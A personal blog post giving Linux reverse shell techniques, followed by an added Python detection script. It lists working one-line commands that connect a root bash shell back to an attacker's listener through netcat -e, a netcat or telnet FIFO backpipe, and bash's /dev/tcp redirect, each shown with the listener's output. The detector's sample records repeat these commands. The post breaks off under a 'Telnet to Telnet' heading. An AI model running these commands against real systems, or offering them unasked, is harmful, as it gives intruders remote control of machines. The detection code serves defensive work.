Sam Stelfox

Thoughts from a software engineer, systems hacker and Linux gubernāre.

Linux Remote Shell Techniques

Abbreviations: AIP and APORT are the attacker's IP address and listening port; TIP and TPORT are the target's IP address and source port as they appear in netcat's connect message.

Standard Unsecure Netcat

This technique relies on netcat having been built with the -e option enabled. Most distributions leave that feature out at compile time (the GAPING_SECURITY_HOLE define) precisely because it lets netcat hand its connection straight to an arbitrary program.

Target:

[root@target ~]# nc <AIP> <APORT> -e /bin/bash

Attacker:

[root@attacker ~]# nc -n -vv -l -p <APORT>
listening on [any] <APORT> ...
connect to [<AIP>] from (UNKNOWN) [<TIP>] <TPORT>
id
uid=0(root) gid=0(root) groups=0(root)

Using Netcat with Security Hole Closed

This is based on the common technique used to build netcat relays. When GAPING_SECURITY_HOLE is disabled at compile time, which means you don't have access to the -e option of netcat, most people pass on netcat and move to something else. That just isn't necessary. Create a FIFO (named pipe) and use it as a backpipe: whatever netcat receives is piped into /bin/bash as its input, bash writes its output into the FIFO, and netcat reads the FIFO as its own standard input and sends it back over the connection.

Target:

[root@target ~]# mknod backpipe p && nc <AIP> <APORT> 0<backpipe | /bin/bash 1>backpipe

Attacker:

[root@attacker ~]# nc -n -vv -l -p <APORT>
listening on [any] <APORT> ...
connect to [<AIP>] from (UNKNOWN) [<TIP>] <TPORT>
id
uid=0(root) gid=0(root) groups=0(root)

Netcat Without Netcat

I love "hacks" that use features of the operating system against itself. This is one of those "hacks". It uses bash's built-in /dev/tcp/<host>/<port> redirection target to connect an interactive /bin/bash to a remote system. It's not always available (the feature is bash-specific and can be left out when bash is compiled), but can be quite handy when it is.

Target:

[root@target ~]# /bin/bash -i > /dev/tcp/<AIP>/<APORT> 0<&1 2>&1

Attacker:

[root@attacker ~]# nc -n -vv -l -p <APORT>
listening on [any] <APORT> ...
connect to [<AIP>] from (UNKNOWN) [<TIP>] <TPORT>
[root@target ~]# id
uid=0(root) gid=0(root) groups=0(root)
[root@target ~]#

Netcat Without Netcat or /dev/tcp

For when /dev/tcp is not available either, combine the telnet client with the backpipe trick from above.

Target:

[root@target ~]# mknod backpipe p && telnet <AIP> <APORT> 0<backpipe | /bin/bash 1>backpipe

Attacker:

[root@attacker ~]# nc -n -vv -l -p <APORT>
listening on [any] <APORT> ...
connect to [<AIP>] from (UNKNOWN) [<TIP>] <TPORT>
id
uid=0(root) gid=0(root) groups=0(root)
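As an added example that is not part of the original post, here is a small Python detector for the four command shapes above (netcat -e, netcat plus FIFO backpipe, the bash /dev/tcp redirect, and telnet plus FIFO backpipe), run over constructed command-line records of the kind shell auditing produces. The rule names, the scan()/classify() helpers and the sample records are my own; the addresses are documentation ranges, not real hosts.

```python
import re

# One regex per technique from the post. Input is a full command string as
# recorded by shell auditing (bash -c arguments, auditd PROCTITLE, history),
# not a single process's argv: the shell consumes redirections and '&&'.
RULES = {
    "netcat -e shell": re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s+/bin/(ba)?sh"),
    "netcat fifo backpipe": re.compile(
        r"\b(mknod|mkfifo)\s+\S+.*\b(nc|ncat|netcat)\b.*\|\s*/bin/(ba)?sh"),
    "bash /dev/tcp redirect": re.compile(r"/bin/(ba)?sh\s+-i\b.*/dev/tcp/"),
    "telnet fifo backpipe": re.compile(
        r"\b(mknod|mkfifo)\s+\S+.*\btelnet\b.*\|\s*/bin/(ba)?sh"),
}


def classify(cmdline):
    """Return the names of every rule the command string matches."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


def scan(records):
    """records: iterable of (pid, uid, cmdline). Returns one alert per hit."""
    alerts = []
    for pid, uid, cmdline in records:
        hits = classify(cmdline)
        if hits:
            alerts.append({
                "pid": pid,
                "uid": uid,
                # every shell in the post lands as root; treat that as worst case
                "severity": "high" if uid == 0 else "medium",
                "rules": hits,
                "cmdline": cmdline,
            })
    return alerts


# Constructed sample records; addresses are documentation ranges, not real hosts.
SAMPLE = [
    (1201, 0, "nc 198.51.100.7 4444 -e /bin/bash"),
    (1202, 0, "mknod backpipe p && nc 198.51.100.7 4444 0<backpipe | /bin/bash 1>backpipe"),
    (1203, 1000, "/bin/bash -i > /dev/tcp/198.51.100.7/4444 0<&1 2>&1"),
    (1204, 0, "mknod backpipe p && telnet 198.51.100.7 4444 0<backpipe | /bin/bash 1>backpipe"),
    (1205, 1000, "nc -z -v 203.0.113.10 22"),  # benign port check, no shell handed over
    (1206, 1000, "/bin/bash -i"),               # ordinary interactive shell
]

if __name__ == "__main__":
    for alert in scan(SAMPLE):
        print(alert["severity"], alert["pid"], alert["rules"])
```

A per-process view (ps, /proc/<pid>/cmdline) sees only `nc <AIP> <APORT>` and a bare `/bin/bash`, because the shell handles the `0<backpipe`, `|` and `1>backpipe` itself; to catch the FIFO variants from process data alone you need to correlate a netcat or telnet process with a shell whose stdin or stdout is the same pipe or FIFO.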

Telnet to Telnet

By god this is an ugly one... but it works... and if it's all you got then it's all you got.

Target: